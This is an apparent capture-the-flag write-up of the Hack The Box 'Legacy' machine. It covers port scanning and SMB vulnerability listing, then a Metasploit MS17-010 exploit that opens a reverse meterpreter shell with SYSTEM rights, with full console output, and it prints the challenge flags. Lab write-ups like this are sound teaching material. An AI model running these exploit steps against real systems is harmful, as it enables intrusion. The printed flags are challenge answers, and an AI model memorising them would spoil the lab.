Legacy

22 September 2019

Starting information

Machine IP10.10.10.4
SystemWindows

Network enumeration

I start by modifying my /etc/hosts file to avoid writing the IP everytime :

10.10.10.4 legacy

Then I look for open ports and start an openvas scan:

 nmap -p- legacy -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 20:20 CEST
Nmap scan report for legacy (10.10.10.4)
Host is up (0.034s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
139/tcp  open   netbios-ssn
445/tcp  open   microsoft-ds
3389/tcp closed ms-wbt-server

Now I can start nmap scripts on the open ports to gather more information:

 nmap -p139,445,3389 -A -Pn legacy
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-22 20:26 CEST
Nmap scan report for legacy (10.10.10.4)
Host is up (0.034s latency).

PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h24m49s, deviation: 2h07m16s, median: 4d22h54m49s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:5b:81 (VMware)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-09-27T23:21:43+03:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.34 seconds

Information gathered

My OpenVAS scan is now finished, from nmap and OpenVas here is what I know:

Operating System

Windows XP (Windows 2000 LAN Manager)

Open ports

PortService
139netbios-ssn
445microsoft-ds
3389ms-wbt-server

Vulnerabilities

CVEServiceDescriptionSeverity
CVE-2008-4114SMBVulnerabilities in SMB Could Allow Remote Code Execution (958687) - RemoteHigh
CVE-2008-4834SMBVulnerabilities in SMB Could Allow Remote Code Execution (958687) - RemoteHigh
CVE-2008-4835SMBVulnerabilities in SMB Could Allow Remote Code Execution (958687) - RemoteHigh
CVE-2017-0143SMBMicrosoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)High
CVE-2017-0144SMBMicrosoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)High
CVE-2017-0145SMBMicrosoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)High
CVE-2017-0146SMBMicrosoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)High
CVE-2017-0147SMBMicrosoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)High
CVE-2017-0148SMBMicrosoft Windows SMB Server Multiple Vulnerabilities-Remote (4013389)High

SMB exploit

I start Metasploit with msfconsole and search for the CVE I have found.

msf5 > search 2008-4114

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  auxiliary/dos/windows/smb/ms09_001_write                   normal  No     Microsoft SRV.SYS WriteAndX Invalid DataOffset

I select the exploit found and configure it to target the IP 10.10.10.4:

msf5 > use auxiliary/dos/windows/smb/ms09_001_write
msf5 auxiliary(dos/windows/smb/ms09_001_write) > show options

Module options (auxiliary/dos/windows/smb/ms09_001_write):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   445              yes       The SMB service port (TCP)

msf5 auxiliary(dos/windows/smb/ms09_001_write) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 auxiliary(dos/windows/smb/ms09_001_write) >

Unfortunately the exploit does not work. From there I tried multiple other exploits listing each CVE discovered earlier. At some point one of them got me a meterpreter terminal:

msf5 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - 	[*] Preparing dynamite...
[*] 10.10.10.4:445 - 		[*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - 	[+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - 	[+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x821eb010
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... GCweOYDs.exe
[*] 10.10.10.4:445 - Created \GCweOYDs.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \GCweOYDs.exe...
[*] Meterpreter session 1 opened (10.10.14.7:4444 -> 10.10.10.4:1031) at 2019-09-22 20:54:18 +0200

meterpreter >

Sweet, let's see if I am root already:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Even better, getting the user and root flags should be a formality from there:

meterpreter > cat "C:\Documents and Settings\john\Desktop\user.txt"
e69af0e4f443de7e36876fda4ec7644f

meterpreter > cat "C:\Documents and Settings\Administrator\Desktop\root.txt"
993442d258b0e0ec917cae9e695d5713